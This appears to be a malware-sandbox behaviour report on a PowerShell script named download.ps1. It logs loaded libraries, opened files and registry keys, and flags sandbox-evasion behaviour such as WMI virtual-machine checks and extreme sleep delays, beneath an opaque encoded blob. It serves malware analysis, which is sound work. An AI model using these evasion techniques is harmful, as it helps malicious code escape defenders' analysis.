q//c64St9suST1VTDWyY8e6SCRFWqqUBUHRYv5CZotu7+keLnCSDFLK7XHJWF3nxL2OZQzfG2cmO97JtvX5+eNldLQ1xPEehsgY63QoGquNmKpPGrZ9l/mVTKleekCllUB2mpX8a1zMfxraq4KddPhI5YP6dVLD4fWh0L2WYJxNBp72CB05Y8d/01DpJHjResU8CA2BuaSrzuXQhlB3PbPyrXoUrOSmXYYCDM2HRiVrBNRSdI1mi8BBQwaeeYCfvBW3AUS1vpmV/ucmj9wHCO5ylaGGKzzU5aoSu3Nioo67X3U2OkAyWD3HAQYKDTu3iefFX+aWBZYAO4g+k3cBcG63MJQ7DgU7IFmTtK3BFSGDdzs95YMNiF83R4o3r8uBChG0AxiyUyOLF8+kdhJfNUT2pBG8Ah6yWW25ODkYVLR5lLEvdgcKfRcJk1ceJ6XfI2oJ5qtGjezAijOcisRhdiiOyBjSWrCWwn/7dXL1KaxtUfBGTd5dIdcGFnmmq6rXP+KCHhjtG6xC0XSxqx+qeyF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: pdblib.pdbH source: powershell.exe, 00000000.00000002.2222295833.000001D9CBAF7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.2223640221.000001D9CBEBA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2225663167.000001D9CBEE6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V source: powershell.exe, 00000000.00000002.2181821964.000001D9B1A92000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbogramFi source: powershell.exe, 00000000.00000002.2225663167.000001D9CBEE6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ows\dll\mscorlib.pdb.0? source: powershell.exe, 00000000.00000002.2222295833.000001D9CBAF7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2223640221.000001D9CBE03000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb (x! source: powershell.exe, 00000000.00000002.2225663167.000001D9CBF13000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ows\dll\mscorlib.pdbg source: powershell.exe, 00000000.00000002.2222295833.000001D9CBAF7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb=\\ENGI source: powershell.exe, 00000000.00000002.2225663167.000001D9CBF13000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD347AD2A5 pushad ; iretd 0_2_00007FFD347AD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348C752B push ebx; iretd 0_2_00007FFD348C756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348C4FA5 push edi; ret 0_2_00007FFD348C4FA6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34997041 push edx; retf 0_2_00007FFD349971CB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34B7C3E4 pushfd ; ret 0_2_00007FFD34B7C3E5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34B7CBB4 pushad ; retf 0_2_00007FFD34B7CBB5

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Queries memory information (via WMI often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5771Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4073Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6104Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
